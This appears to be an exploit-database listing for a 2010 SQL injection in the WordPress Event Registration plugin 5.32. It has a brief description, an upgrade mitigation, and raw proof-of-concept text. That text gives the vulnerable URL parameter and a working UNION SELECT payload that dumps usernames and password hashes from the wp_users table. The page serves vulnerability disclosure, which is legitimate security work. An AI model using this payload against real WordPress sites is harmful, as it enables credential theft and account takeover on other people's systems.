header-logo
Suggest Exploit
vendor:
Event Registration
by:
k3m4n9i
6,8
CVSS
SQL Injection
89
CWE
Product Name: Event Registration
Affected Version From: 5.32
Affected Version To: 5.32
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2010

WordPress Event Registration SQL injection

An attacker can exploit a SQL injection vulnerability in the Event Registration plugin for WordPress. By sending a specially crafted request to the vulnerable server, an attacker can execute arbitrary SQL commands in the back-end database. This can be used to bypass authentication and gain access to sensitive data such as passwords, usernames, and other sensitive information stored in the database.

Mitigation:

Upgrade to the latest version of the plugin.
Source

Exploit-DB raw data:

[ Wordpress Event Registration SQL injection ]
# Author: k3m4n9i
# Homepage: http://alko.web.id/
# Date: 13 November, 2010

[ Software Information ]
[+] Vendor : http://edgetechweb.com/
[+] Software Link: http://wordpress.org/extend/plugins/event-registration/
[+] Version: 5.32 or lower

[ Proof of Concept ]

[-] Vulnerable File
http://server/events/?regevent_action=register&event_id=[gotcha]

[-] Xpl
%20union%20select%201,group_concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20wp_users--